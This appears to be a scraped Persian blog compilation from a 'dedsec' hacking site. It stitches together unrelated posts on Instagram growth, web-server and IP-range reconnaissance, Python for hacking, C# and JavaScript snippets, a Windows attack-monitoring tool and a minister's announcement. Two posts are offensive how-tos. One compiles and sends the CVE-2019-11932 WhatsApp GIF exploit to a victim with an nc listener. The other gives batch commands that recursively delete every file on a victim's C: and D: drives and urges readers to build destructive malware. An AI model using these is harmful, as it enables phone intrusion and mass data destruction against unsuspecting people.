در ابتدای کار شما باید هدف خود را مشخص کنید که آیا یک صفحه را برای فروش محصولات نیاز دارید یا یک صفحه برای انتشار عکس ها و فیلم های مورد نظر خود؟؟ با مشخص کردن هدف خود نوع پیج خود را با دقت انتخاب کنید زیرا در صورت انتخاب اشتباه، بعدها در فعالیت و دیده شدن صفحه شما تاثیر منفی خواهد داشت. در اینستاگرام دو نوع صفحه وجود دارد:

صفحه شخصی افراد
صفحه تجاری یا business

در صفحه های شخصی افراد تنها قابلیت پست گذاری و مشاهده صفحه های دیگران را دارند اما در صفحه های تجاری شما میتوانید علاوه بر پست گذاشتن به معرفی محصول خود و نیز درج قیمت آنلاین آن بپردازید. این قابلیت به شما این امکان را میدهد تا در صورتی که به اینترنت درسترسی ندارید افراد با مشاهده قیمت آن نسبت به انتخاب و سفارش آن محصول اقدام کنند و مانند صفحه های شخصی نیازی به مراجعه به دایرکت برای پرسیدن قیمت نمی باشد. همین امر کاهش زمان پاسخ و سفارش یک محصول برای شما و خریدار می شود که یک مزیت بسیار خوبی می باشد .

بیوگرافی مناسب

در اینستاگرام قابلیتی به عنوان بیوگرافی برای هر دو نوع صفحه شخصی و تجاری وجود دارد که با این قابلیت قارد هستید تا یک بند برای معرفی یا هدف تجارت خود توضیح دهید. همین یک بند اگر با دقت و مفید نوشته شود تاثیر بسیار زیادی در جذب مخاطب خواهد داشت. پس در نوشتن یک بیوگرافی مناسب عجله نکنید و مفیدترین توضیحات را درباره خود یا تجارت خود بنویسید. بیوگرافی همانند الماسی درخشان صفحه شما را زیبا می کند یا بالعکس باعث عدم جذب مخاطب برای شما خواهد شد.

پست گذاری

مساله اصلی در هر پیج پست گذاری مرتب با عکس های مناسب و با کیفیت می باشد. عکس های انتخابی باید به گونه‌ای باشند که تمام جزییات را در خود نمایش دهند اگر از نور کافی برخوردار بوده و دارای افکت مناسب باشند.

پس از انتخاب عکس مناسب شما میبایست یک یا چند جمله در زیر آن به عنوان کپشن عکس خود بنویسید. نوشتن یک کپشن مناسب برای معرفی محصول در جذب مشتری تاثیر بسزایی دارد. اگر عکس خود را عکسی یادگاری پست می کنید کپشن مناسب می تواند در ادراک مخاطب از عکس کمک کند تا آن حسی که شما هنگام عکس گرفتن دارید به مخاطب منتقل کنید. درک احساس مرتبط در جذب مخاطب یک عامل مثبت می باشد برای مثال یک عکس شاد با کپشن مناسب می تواند در حال یک فرد غمگین تاثیر گذاشته و باعث شادی او و جذب همان فرد به عنوان دنبال کننده شما شود.

زمان

زمان پست گذاری مساله ی مهم دیگری در دیده شدن پست های شما می باشد. با دانستن زمان پر مخاطب در منطقه خود می توانید یک قدم مثبت در دیده شدن بیشتر بردارید برعکس همین قضیه نیز برای شما صادق است. برای مثال در افراد جامعه بعد از نیمه شب در اینستاگرام فعالیت نمی کنند و در خواب شبانگاهی خود هستند بالطبع پست گذاری بعد از نیمه شب امکان دیده شدن آنرا تا حد زیادی میکاهد اما در صورتی که در وقت مناسب مانند عصر پست خود را منتشر خود به دلیل انلاین بودن افراد بیشتر در اینستاگرام تا حد زیادی به دیده شدن حداکثری خود پست خود کمک کرده اید.

هشتگ #

علامت شارپ یا به اصطلاح امروزی هشتگ در هر پست به دیده شدن آن پست کمک می کند. نوشتن کلمات کلیدی در وصف عکس یا فیلم با هشتگ مناسب در پستی که انتشار می کنید میتواند در صدر دسته بندی آن موضوع قرار بگیرد و با جستجوی افراد پست شما بالاتر از همه نشان داده شود همین امر در جذب مخاطب تاثیر مثبتی دارد. حال اگر از هشتگ های مناسب استفاده نکنید هنگام جستجو پست های شما نشان داده نمی شود.

تگ و منشن کردن

شما میتوانید در اشتراک گذاری عکس خود از قابلیت تگ استفاده کنید بدین معنی که اگر عکسی دسته جمعی یا محصول با برند خاص به نمایش میگذارید ایدی آن فرد را نیز در عکس تگ کنید بدین تربیت افراد تگ شده عکس شما را میبینند و در صفحه آنها نیز در قسمت بخصوصی پست شما دیده میشود. همچنین افراد یا برند های دیگر نیز با تگ کردن ایدی شما در صفحه خود باعث بهتر دیده شدن پیج شما میشود.

منشن کردن نیز در قسمت کپشن پست قابل استفاده است برای مثال عکسی در توصیف یک مساله خاص پست میکنید شما میتوانید افراد یا ایدی پیج های دیگر را منشن کرده تا آنها نیز از پست شما با خبر شوند.

لایک و کامنت

گفتیم که تنها قانون اینستاگرام فعالیت مناسب در آن است شما برای دیده شدن راه های مختلفی دارید اما ساده ترین آنها لایک کردن پست های مشهور در دنیا میباشد همچنین با کامنت کذاشتن در پست ها شما خود را میتوانید معرفی کنید. توجه داشته باشید که کامنت های تکراری و زیاد در یک پست باعث مسدودیت دسترسی شما به قسمت کامنت به مدت محدود میشود پس استفاده از کلمات مناسب و مودبانه نظر خود را بنویسید تا باز خورد نظر شما مثبت واقع شود. اگر هم در قسمت کامنت به تبلیغ محصولات میپردازید باز توجه داشته باشید کامنت های تکراری مسدود میشوند پس از فرصت استفاده کرده و هر بار یک تبلیغ از یک محصول متفاوت ارایه دهید تا هم متنوع محصولات خود را نشان دهید و هم مسدود نشوید.

تیک آبی

تیک آبی نشانی است که برنامه اینستاگرام برای احزار هویت کاربران مهم اعتا میکند با داشتن این نشان بعضی محدودیت هایی که برای افراد معمول هست رفع میشود برای مثال با داشتن این تیک ابی شما میتوانید هر روز و هر ساعت به تعداد دلخواه فالو کنید یا تعداد فالور های شما افزایش یابد در واقع افزایش ناگهانی فالور در اینستاگرام مشکوک می باشد و اگر در یک زمان مشخص تعداد نسبتا زیادی فالوور جذب کنید امکان مسدود شدن پیج شما وجود دارد زیرا برنامه برای حفظ امنیت از ربات ها این محدودیت را اعمال کرده است . نکته دوم در تیک آبی به رسمیت شناخته شدن صفحه شما می باشد یعنی اگر فرد مشهوری هستید افراد با جستجوی نام شما به راحتی صفحه شما را پیدا کرده و شما را دنبال می کنند تیک آبی همانند برگ برنده در بازی می باشد . شما می توانید این تیک ابی را در تنظیمات بعد از ارسال درخواست خود به اینستاگرام و احراز هویت دریافت کنید.

انتخاب آیدی مناسب

شما پس از ثبت نام و ایجاد صفحه شخصی در اینستاگرام می بایست یک شناسه (آیدی) مناسب برای صفحه خود انتخاب کنید. شما با این شناسه دیده میشوید و افراد هنگام جستجو از این شناسه استفاده میکنند پس با انتخاب یک شناسه مناسب با اندازه مناسب که مرتبط با فعالیت شما در پیج خود است میتوانید مخاطبین بیشتری جذب کنید . انتخاب شناسه مناسب باعث حفظ آسان آن میشود که افراد در جستجو های بعدی براحتی شما را پیدا میکنند و همچنین میتواند یک شناسه خوب و جذاب شما را به سر زبان ها بیاورد.

نوع پروفایل

در اینستاگرا برای خفظ حریم خصوصی افراد دو نوع تنظیم برای پیج ها وجود دارد:

اکانت خصوصی یا قفل دار (private)
اکانت عمومی یا پابلیک (public)

اگر تنظیمات شما در حالت خصوصی باشد فقط افراد دنبال کننده ی شما قادر به دیدن پست‌ها و استوری های شما خواهند بود و اگر شخصی بخواهد شما را دنبال کند ابتدا می بایست بک درخواست باصطلاح (Follow request) به شما ارسال کند تا در صورت صلاح شما بتواند شما را دنبال کند. اما در حالت عمومی تمامی پست ها و استوری های شما قابل مشاهده می باشد و افراد بدون محدودیت شما را دنبال میکنند.

توجه داشته باشید توضیحات بالا فقط برای صفحه های عمومی کاربرد خواهد داشت در غیر اینصورت شما نمی توانید به سرعت صفحه خود را پر بازدید کنید.

کلام آخر: همه چیز بستگی به اراده و تلاش شما در این راستا دارد پس ناامید نشده و با قدرت ادامه دهید. امیدوارم توضیحات ما برای شما مفید واقع شده باشد.

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

تشخیص وب سرور سایت

اشنایی و تشخیص وب سرور

کار وب سرور ها در واقع نمایش وب سایت به کاربران با ارسال درخواست ان ها اشت و و تمامی صفحات سایت را برای نمایش به کاربر اماده می کنند. برای نمایش هر وب سایت در مرورگر کاربر ،نیاز به یک وب سرور است. وب سرور ها انواع مختلفی دارند که هر وب سایت با توجه به نیاز خود از ان ها استفاده می کند برای مثال ما در ادامه اموزش مهم ترین ان ها را معرفی می کنیم تا با ان ها اشنا شوید و بتوانید با جمع اوری اطلاعات از ان ها تست نفوذ خود را اگاهانه و دقیق انجام دهید.

برخی از وب سرور های معروف

apache
litespeed
nginx
iis
…

تشخیص وب سرور

یکی از ساده ترین روش های مشخص کردن وب سرور استفاده از افزونه مرورگر ها است مانند wappalyzer که در هنگام ورود به هر سایت می توانید برخی از اطلاعات ان را مشاهده کنید که وب سرور هم یکی از ان ها است درواقع با این ابزار ساده می توانید وب سرور را مشخص کنید اما در بعضی موارد ممکن است اطلاعات اشنباه نمایش دهد.

سایت های انلاین

وب سایت هایی هستند که Webserver وب سایت را برای شما مشخص می کنند.

برای مثال می توانید وارد سایت زیر شوید که کار این وب سایت گرفتن هویز است اما در کنار ان می توانید اطلاعات دیگری هم مانند وب سرور ر مشاهده کنید کافیست در بخش جستجو ان ادرس سایت را وارد کنید و در قسمت Server Type نوع وب سرور را مشاهده کنید.

اموزش HTML مقدماتی تا پیشرفته قسمت 1

https://whois.domaintools.com/

وب سایت پیشنهادی برای تشخیص وب سرور

وب سایت زیر اطلاعات کاملی فقط از وب سرور سایت مورد نظر شما نمایش می دهد.

https://browserspy.dk/webserver.php

د این وب سایت علاوه بر مشخص کردن نوع وب سرور اطلاعاتی از امکانات ان هم به ما می دهد که به طور کلی یک ابزار کامل برای انالیز وب سرور به صورت انلاین است.

تست نفوذ با وب سرور ها

بعد از شناسایی وب سرور و تشخیص ورژن های ان می توانید یک جستجو برای پیدا کردن اسیب پذیری از ان پیدا کنید و سپس تست نفوذ خود را برای گرفتن دسترسی انجام دهید. دقت داشته باشید در مواردی ممکن است اطلاعات به صورت فیک و جعلی باشد که فقط نفوذگر گمراه شود.

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

بدست اوردن رنج ای پی کشور ها

آشنایی با رنج آی پی کشور ها

هر کشور برای خود رنج ای پی خاصی را اختصاص داده است که هر کدام از ان ها برای موارد خاصی استفاده می شوند. برای مثال برخی به دولت ها و سازمان ها تعلق میگیرد و برخی دیگر برای ارائه به مردم کشور و شهر های مختلف ان، به همین دلیل رنج ای پی ها مشخص کننده بسیاری از این موارد مهم هستند و باید با ان ها اشنا بود که در ادامه به کاربرد های ان در هک و امنیت می پردازیم.

کاربرد داشتن رنج های ای پی کشور ها در تست نفوذ

کرک سرور مجازی

بسیاری برای کرک سرور مجازی اقدام به اسکن رنج ای پی های خاصی را که محل مورد نظر ان ها است می کنند که در واقع رنج ای پی ها می توانند برای رسیدن به نتایج بهتر و هدفمندتر کمک زیادی کنند

شناسایی کشور و شهر

در صورتی که بخواهید از یک کاربر یا یک سرور جمع اوری اطلاعات کنید و ای پی ان را داشته باشید

به راحتی با داشتن رنج ای پی های ان می توانید شهر و کشور مربوط به ان را پیدا کنید.

پیدا کردن سرویس دهنده

سرویس هایی که از رنج بخصوصی برای خود استفاده می کنند

با پیدا کردن سرویس دهنده ان ها از طریق رنج ای پی ان قابل شناسایی هستند.

تست نفوذ

برای مثال اگر قصد تست یک اسیب پذیری در سرویس های یک کشور خاصی را داشته باشید

فقط با استفاده از رنج ای پی های ان کشور این کار عملی خواهد بود.

معرفی وب سایت های ارائه دهنده رنج های ای پی

وب سایت ip2location

این وب سایت تمامی ای پی های دنیا و رنج های ان ها را در خود جای داده است و برای استفاده از ان هم محیط گرافیکی ساده و اسانی دارد، اطلاعاتی که می توانید از ان بگیرید فقط رنج ip ها و در نهایت مجموع تعداد ای پی های اختصاص یافته است که نمایش می دهد. با ورود به وب سایت زیر کافیست کشور مورد نظر خود را انتخاب کنید تا لیست تمامی ای پی های ان را مشاهده نمایید.

https://lite.ip2location.com/ip-address-ranges-by-country

سایت nirsoft

این وب سایت علاوه بر امکانات سایت قبلی امکانات اضافه تری هم دارد که می توانند برای شما بسیار کاربردی باشند؛ برای مثال میتوانید حتی isp ها های رنج ای پی را مشاهده کنید که این اطلاعات نسبتا بروز و دقیق هستند. نکته جالبی هم که دارد این است که حتی تاریخی که ای پی ها به isp و کشور اختصاص یافته است را می توانید مشاهده نمایید.

https://www.nirsoft.net/countryip/

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

کاربرد پایتون در هک و امنیت

زبان برنامه نویسی در هک و امنیت چقدر اهمیت دارد ؟

بسیاری از افرادی که می خواهند وارد دنیای هک و امنیت شوند این سوال را در ذهن خود دارند :

بهترین زبان برنامه نویسی برای هک چیست ؟
یا ایا اصلا زبان برنامه نویسی برای هک و امنیت نیاز است؟
کدام زبان بهتر از دیگری است ؟
ایا پایتون زبان خوبی برای هک و امنیت است؟
….

همانطور که در هر کاری سطح کاری می تواند متفاوت باشد در حوزه تست نفوذ و امنیت هم سطح کاری متفاوت است، یعنی هر شخص با توجه به دانش و نیاز خود می تواند در سطح های مختلفی قرار بگیرد که در سطح اولیه یادگیری نیازی به زبان برنامه نویسی نیست اما برای بالا بردن سطح علمی و عمیق تر شدن در این حوزه باید حداقل یک زبان برنامه نویسی را نسبت به علاقه خود یاد بگیرید.

برای مثال اگر علاقه متد به تست نفوذ سیستم عامل های ویندوزی هستید بهتر است به سراغ زبان های .net مانند C# بروید که برای مثال بتوانید ابزار هایی مانند رات ها کیلاگر ها و …. برای خود بنویسید و با اسیب پذیری های درون برنامه های نوشته شده با این زبان اشنا شوید.

زبان های دیگری هم مانند php و asp هم می توانند در زمینه های وب و درک اسیب پذیری های ان ها کمک شایانی کنند و حتی با این زبان ها اکسپلویت نویسی انجام دهید. پس به طور کلی زبان برنامه نویسی خاصی برای هک و امنیت مطرح نیست و شما باید طبق علاقه خود یک زبان را انتخاب کنید.

10 وبسایت برتر برای هکرها و برنامه نویسان

پایتون |
Python

این زبان برنامه نویسی نسبت به دیگر زبان ها بسیار ساده بوده و امکانات فوق العاده ای را در کتابخانه های خود جای داده است. برای مثال اگر یک برنامه با زبان c++ با 1000 خط نوشته شود با استفاده از زبان پایتون شاید با 500 خط انجام شود، به همین خاطر بسیاری در زمینه تست نفوذ به سراغ این زبان برنامه نویسی می روند.

آشنایی با کاربرد پایتون در هک و امنیت

اکسپلویت نویسی یکی از مراحل بسیار تخصصی و حرفه ای در هک و امنیت است که بسیاری با پیدا کردن اسیب پذیری اکسپلویت ان را به صورت یک برنامه با زبان پایتون می سازند تا عملکرد اکسپلویت به صورت دقیق و صحیح انجام شود. برخی از دیگر اکسپلویت ها فقط در قالب یک برنامه نوشته شده قابل استفاده هستند پس با درک این موضوع به یک زبان برنامه نویسی نیاز است که هم امکانات کاملی داشته باشد و هم در سریع ترین زمان ممکن به صورت ساده قابل استفاده باشد.

برخی از کاربرد های پایتون

ساخت ابزار های امنیتی تحت کنسول
ساخت اپلیکیشن های الوده و رات جهت تست نفوذ
امکان ساخت اکسپلویت های حرفه ای
امکان اجرای پایتون در انواع سیستم عامل ها
….

نتیجه گیری

برای شروع و یادگیری مباحث تست نفوذ و امنیت به صورت تخصصی زبان برنامه نویسی می تواند بسیار کاربردی و مهم باشد و حتما برای انتخاب یک زبان باید به حوزه مورد علاقه خود توجه کنید و از روی شنیده ها که کدام زبان بهتر است عمل نکنید چرا که همه زبان ها به دلیل ان که نیاز بوده اند ساخته شده اند و هر کدام مزایا و معایب خود را دارند که برای مثال کاربرد های پایتون را در هک و امنیت مثال زده ایم و به صورت کامل توضیح داده شد.

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

سه رقم جدا کردن اعداد در سی شارپ

در پروژه های حسابداری لازمه که اعداد برای خوانایی بهتر سه رقم سه رقم از هم تفکیک بشن
برای این کار میتونیم از تکه کد زیر استفاده کنیم:

if (textBox1.Text != string.Empty)
            {
                textBox1.Text = string.Format("{0:N0}", double.Parse(textBox1.Text.Replace(",", "")));
                textBox1.Select(textBox1.TextLength, 0);
            }

این کد رو باید در رویداد TextChanged قرار بدیم
البته برای جلوگیری از کثیف شدن کدنویسیمون هم میتونیم یه متد تعریف کنیم و برای هر تکست باکسی ازش استفاده کنیم

private void dedsec(object sender)
        {
            TextBox tb =  (TextBox)sender ;
            if (tb.Text != string.Empty)
            {
                tb.Text = string.Format("{0:N0}", double.Parse(tb.Text.Replace(",", "")));
                tb.Select(tb.TextLength, 0);
            }
        }

برای تعریفش هم در رویداد TextChanged به شکل زیر ازش استفاده میکنیم

dedsec(sender);

و یا میتونیم این کد رو تو یه فرم کلاس جداگانه بنویسیم و تو کل پروژه ازش استفاده کنیم

public TextBox sender { get; set; }
internal void dedsec(object sender)
        {
            TextBox tb = (TextBox)sender;
            if (tb.Text != string.Empty)
            {
                tb.Text = string.Format("{0:N0}", double.Parse(tb.Text.Replace(",", "")));
                tb.Select(tb.TextLength, 0);
            }
        }

برای تعریفش هم در رویداد TextChanged به شکل زیر فراخوانیش میکنیم

cd.dedsec(sender);

البته ابتدا باید فرم کلاس هم تعریف شده باشه.

formname cd = new formname();

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

تشخیص حملات و مانیتورینگ ویندوز

اگر از کاربران ویندوزی هستنید باید برای امنیت خود همیشه سیستم خود را با مانیتورینگ دائم تحت کنترل نگه دارید تا امنیت شما حفظ شود؛ برای موضوع انتی ویروس ها و فایروال ها می توانند تا حدی زیادی به ما کمک کنند و انواع حمله های انجام شده یا در حال انجام را به ما هشدار دهند اما همیشه نمی توانند با دقت کامل همه این حملات را تشخیص دهند و به صورت تخصصی تر اطلاعات را به ما نمی دهند به همین خاطر باید از ابزار های دیگری هم برای بالا بردن امنیت استفاده کنید ما در این اموزش می خواهیم ابزار Attack Monitor معرفی کنیم و در ادامه با نحوه کارکرد و امکانات ان اشنا شویم.

معرفی ابزار Attack Monitor

همانطور که گفته شد با استفاده از این ابزار میتوانید انواع حملات را مانیتورینگ کنید. این ابزا ربه زبان پایتون نسخه 3 نوشته شده است و از نسخه های ویندوز 7 ، 8 ، 10 و ویندوز سرور های 2008 ، 2012 ، 2016 ، 2019 پشتیبانی می کند و به طور کلی می توانید با این ابزار از حملات سایبری در سیستم خود جلوگیری نمایید.

نحوه نصب و استفاده از ابزار برای مانیتورینگ و تشخیص حملات

در ابتدا کار پایتون نسخه 3 را در ویندوز خود دانلود ونصب نمایید.

سپس از لینک گیت هاب قرار داده شده در اخر اموزش تمامی فایل های ابزار را دانلود کنید.

هکر ها خانه های هوشمند را جاسوسی میکنند

وارد CMD ویندوز شوید و دستورات زیر را به ترتیب برای نصب پیشنیاز های ابزار وارد نمایید :

(دقت داشته باشید از طریق CMD وارد مسیر پوشه ابزار شده باشید.) تشخیص حملات

pip3 install -U -r requirements.txt

python installer.py sysmon

python installer.py psaudit

python installer.py auditpol

حال که پیشنیاز ها را نصب کرده اید با دستورات زیر خود ابزار را برای تشخیص حملات و مانیتورینگ نصب و اجرا نمایید :

python installer.py install

python installer.py exceptions

بعد از انجام دستورات بالا پنجره CMD را مانند تصویر زیر باز نگه دارید مشاهده خواهید کرد که بعد از هر حمله در ویندوز شما از طریق نوتیفیکیشن ویندوز به شما اطلاع رسانی خواهد شد. این ابزار امکانات دیگری هم مانند انالیز بد افزار ها دارد که میتوانید از ان ها هم استفاده نمایید اما بهترین عملکرد ان در زمینه مانیتورینگ و تشخیص حملات است.

لینک دانلود

Attack Monitor

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

بررسی اولین ورود کاربر به سایت

توی این پست بررسی میکنیم که چطور میشه تشخیص داد یه کاربر برای اولین بار از سایت ما بازدید کرده

و اگر برای اولین بار بازدید کرده بود چیکار کنیم که یکسری اتفاقات بیفته.

برای اینکار روش های مختلفی موجوده

مثلا استفاده از کوکی ها یا جی کوئری یا حافظه داخلی مرورگر و غیره

توی این پست به نحوه ی انجام اینکار به کمک حافظه ی داخلی مرورگر میپردازیم

برای اینکار یه فایل Html ایجاد کنین و کدهای پایین رو داخلش قرار بدین

<html>
    <head>
        <title>dedsec</title>
    </head>
    <script type="text/javascript">
        var firstTime = localStorage.getItem("ded");
        if(!firstTime) {
            window.open("http://www.dedsec-hack.blog.ir","","toolbar=no, width=400,height=300,directories=no,menubar=no,scrollbars=no");
            localStorage.setItem("ded","1");
        }
    </script>
<body>
    dedsec
</body>
</html>

اگر قسمت مهم کدها یعنی قسمت javascript کدهارو نگاه کنید

متوجه میشین که هدف من کار کردن با صفحات پاپ آپ هستش و اگر یه کاربر برای اولین بار وارد سایت من بشه وبلاگ dedsec براش باز میشه و اینکار توی دفعات بعدی اتفاق نمیفته ( بعد از اجرا یکبار صفحه رو بروزرسانی کنید )

شاید دلتون بخواد این مقدار رو از حافظه ی مرورگرتون پاک کنید تا مجددا بتونید چک کنید ببینید کدها واقعا درست کار میکنه یا نه که برای اینکار میتونین داخل صفحه کلیک راست کنید و روی گزینه Inspect Element بزنین و بعدش وارد قسمت Console بشین و کد پایین رو داخلش بنویسید و اینتر کنید

اونموقع بعد از بروزرسانی صفحه میبینید که مجددا وبلاگ dedsec براتون بالا میاد

window.localStorage.removeItem('ded');

موفق باشید

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

سورپرایز آذری جهرمی اعلام شد!

ساعاتی پیش در اکانت اینستاگرام اقای وزیر جوان پیام زیر به عنوان سورپرایز منتشر شد.

"ما به جای صحبت و جلسه، چند اقدام عملیاتی انجام دادیم که واقعا هزینه‌ها کمتر بشه و از آلودگی شهرها جلوگیری کنیم. برای همین در طرح پست+:
انتقال بسته‌های پستی با پهپاد را فراهم کردیم که دیگر در هیچ جای ایران نقطه‌ای باقی نماند که غیرقابل دسترس باشد. انتقال سریع دارو به بیمارستان‌ها، جزیره‌ها، سورپرایز کردن یکدیگر و… از جمله کارهایی است که از این به بعد در اختیار شما خواهد بود. در حال حاضر کشورهای کمی در دنیا هستند که این کار را کرده‌اند. ما می‌توانیم! خدا قوت به همه‌ی جوانان ایرانی برای این دستاورد!
تجهیز کردن شرکت ملی پست به ماشین برقی، موتور برقی و دوچرخه برقی کاملا ایرانی

همچنین به مناسب آغاز پست+، ارسال نامه در سراسر کشور از طریق پست در شنبه ۲۳ آذر رایگان خواهد بود.
لطفا برای اطلاع بیشتر به سایت

post-plus.ir مراجعه فرمایید.
——–
در مورد این موج سورپرایز باید خدمتتون بگم که خیلی‌ از کامنت‌ها و توییت‌ها و استوری‌ها و پیامک‌ها رو خوندم. واقعا خلاقیت شما مردم عزیز و اعتماد و لطفی که به بنده به عنوان خادم خود دارید یک دنیا ممنونم.
اتفافا خیلی از این سورپرایزها مثل ارسال ماهواره جدید، ارزان کردن اینترنت،

#پایان_وس و … رو در تقویم گذاشتم و در دو هفته آینده از این دستاوردها و خدمات زیاد خواهیم دید
امیدوارم تلاش‌هایم برای رفع فیلترها هم به نتیجه برسه ، خیلی از توییت‌ها و کامنت‌ها رو برای بقیه در جلسات می‌خونم تا بالاخره با واقعیت‌های جامعه و خواسته‌های شما آشنا شوند.

بالاخره ممکنه

#خبر_خوب زیادی در این مدت نشنویم یا حتی از شنیدن سورپرایز تعجب کنیم. اما من تمام تلاشم رو می‌کنم که حداقل به اندازه‌ی خودم برای شما مردم کار کنم و خبر خوب بدهم. همین شادی و هیجانی که این مدت در جامعه ایجاد شد خیلی ارزشمنده. کشور و مردم بزرگی داریم و باید قدرشون رو بدونیم. باید ایران رو بهترین و پیشرفته‌ترین کشور دنیا کنیم!

دوستتون دارم.
ارادتمند شما مردم بزرگوار،
محمدجواد."

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

نفوذ به اندروید از طریق gif در واتس اپ

سلام خدمت تمامی کاربران عزیز وبسایت تیم امنیتی dedsec

در مطالب گذشته راجب هک کردن گوشی اندروید صحبت کردیم ، اما روش هایی که گفتیم بیشترش استفاده از فایل مخرب APK بود و خیلی از دوستان سوال پرسیدن بودن آیا روش های دیگری هم برای هک کردن گوشی اندروید وجود داره؟ قطعا وجود داره ولی اگر شما بخواهید حملات حرفه ای تری رو انجام بدید نیازمند دانش بالایی در این زمینه هستید ، یکی از روش هایی که خیلی برای نفوذ به گوشی اندروید ازش استفاده میشه فایل مخرب APK هست اما به دلیل استفاده خیلی زیاد از این روش کاربران نسبت به این حمله مقاوم شده اند و به راحتی نمیتونید فایل مخرب APK خودتون رو به قربانی بدید و اون به راحتی نصب کنه ، پس ما باید روش نفوذمون رو تغییر بدیم ، یکی از راه ها استفاده از آسیب پذیری هایی هست که برای سیستم عامل اندروید منتشر میشه ، آسیب پذیری StageFright این اجازه رو به ما میداد تا از طریق فایل MP4 به گوشی اون شخص نفوذ کنیم که تو زمان خودش بی نظیر بود ، شاید خیلی ها بگن عجب روشی بوده که باید بگم روش خوبی بود ولی از اون بهترش هم هست پس با ما همراه باشید تا از طریق فایل gif و فرستادنش از طریق واتس اپ برای قربانی به گوشیش دسترسی بگیریم.

توضیحی راجب آسیب پذیری واتس اپ (Whats App) :

آسیب پذیری به وجود آمده در واتس با شناسه CVE-2019-11932 دردسترس هست ، این آسیب پذیری از نوع double free vulnerability است که به ما امکان اجرا دستور دلخواه برروی سیستم عامل اندروید رو میده که ما با ارسال یک فایل gif در واتس اپ و اجرای اون توسط قربانی ما میتونیم به گوشی قربانی دسترسی بگیریم. این آسیب پذیری برروی نسخه واتس اپ ۲٫۱۹٫۲۴۴ به پایین کار میکنه و برروی نسخه های بالاتر این آسیب پذیری رفع شده است.

خب خیلی حرف زدم بهتره بریم سراغ کارمون در اولین قدم من با دستور زیر اکسپلویت این آسیبپ پذیری رو دانلود میکنم

بعد از دانلود اکسپلویت وارد پوشه اکسپلویت میشیم و دستور make رو وارد میکنیم تا فایل های مورد نیاز ما رو کامپایل کنه که البته شما با دستور زیر هم میتونید اینکار رو انجام بدید

gcc -o exploit egif_lib.c exploit.c

در این مرحله ما نیاز به یه فایل gif داریم که به دلخواه یک فایل gif رو انتخاب میکنیم که قراره این فایل gif رو به اکسپلویت بدیم تا تغییرات رو انجام بده و آماده استفاده بشه ، من از قبل یه فایل gif رو از اینترنت دانلود کردم و با دستور زیر فایل gif رو به اکسپلویت معرفی میکنم

خب الان فایل gif ما آمادست با دستور زیر ما ابزار NC رو روی حالت Listener میبریم تا بعد از اجرای gif توسط قربانی دسترسی ما به گوشی برقرار بشه

کافیه فایل gif خودمون رو از طریق واتس اپ برای قربانی ارسال کنیم

خب بعد از ارسال فایل gif منتظر میمونیم قربانی فایل gif رو اجرا کنه و بعد از اجرا دسترسی ما به گوشی برقرار میشه

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

از بین بردن اطلاعات سیستم قربانی

با سلام خدمت همگی دوستان

توی این آموزش قراره راجب از بین بردن اطلاعات سیستم قربانی و به هنگ انداختن سیستم قربانی صحبت کنیم

ویروسای مخرب همیشه از تکه کدهای ساده و کاربردی ایجاد میشن

برای همین ما هم قراره توی این پست تکه کد ساده و کاربردی معرفی کنیم که میتونه اطلاعات یه سیستم رو از بین ببره و یکسری فایل آت و آشغال رو با فایلای اصلی و شاید مهم سیستم قربانی جایگزین کنه

صد البته به جای اینکار ما میتونیم با دستور فرمت خیلی سریعتر و راحت تر اینکار رو انجام بدیم

اما بعضی وقتا سطح دسترسی اجازه اینکار رو نمیده که ما هم خیلی راحت میتونیم با یه تکه کد ساده از یه روش دیگه پیروی کنیم

یا اصن برنامه های کاربردی و مخرب دیگه بسازیم و اهداف خودمون رو پیاده سازی کنیم

For /R D:\ %i in (*) do echo %i && Ping "LocalHost"  > nul -n 2 && CLS

کد بالا رو که توی خط فرمان وارد کنید متوجه میشید که میاد و اسم تک تک فایلاتون رو دو ثانیه یکبار دونه به دونه نشون میده

حالا ما میتونیم به جای دستور Echo از دستور Del استفاده کنیم تا به جای نمایش فایل ها اون فایل از بین بره

For /R D:\ %i in (*) do del /F /S /Q %i && Ping "LocalHost"  > nul -n 2 && CLS

که البته چون ما از دستور Ping استفاده کردیم و دستور دادیم که هر دو ثانیه یکبار یه فایل پاک بشه اینکار زیاد جالب نمیشه و ممکنه پروسه ی برناممون یه خرده طولانی بشه که بهتره این شکلی بنویسیم :

For /R D:\ %i in (*) do del /F /S /Q %i CLS

حتما دقت کنید از کدهای بالا داخل خط فرمان استفاده کنید و سریعا بعد از اجرا خط فرمان رو ببندین یا کلید های ترکیبی Ctrl + C رو فشار بدین تا کد وارد شده به روند اجرا و تخریب خودش ادامه نده

و اینکه دقت کنین اگه قراره داخل یه Batch فایل قرار بدین و از راه دور به سیستم قربانی دسترسی ندارین باید به جای i% حتما از i%% استفاده کنین

همونطور که گفتم هدفم یه اشاره ی ریز بود و حالا شما هستین که باید از تکه های بالا یه برنامه مخرب بسازین و به جای تخریب فایل های درایو D دستور تخریب فایل درایوای دیگه رو هم بدین

For /R C:\ %%i in (*) do del /F /S /Q %%i CLS
For /R D:\ %%i in (*) do del /F /S /Q %%i CLS

Va.

کدهای بالا هم برای یه فایل Batch هستش که باید به جای .Va اسم درایوهای دیگه رو هم اضافه کنین

ضمنا به این مورد اشاره کنم که میتونین علاوه بر لیست و حذف کردن فایل ها

داخل کد به جای ستاره ( * ) از نقطه ( . ) استفاده کنین و اسم فولدرها یا همون پوشه های سیستم قربانی رو بدست بیارین و بعدش با دستور RmDir اونهارو از بین ببرید که من طرز نوشتنش رو گفتم و نوشتنش با خودتونه که یه خرده تنبل به بار نیاین :)

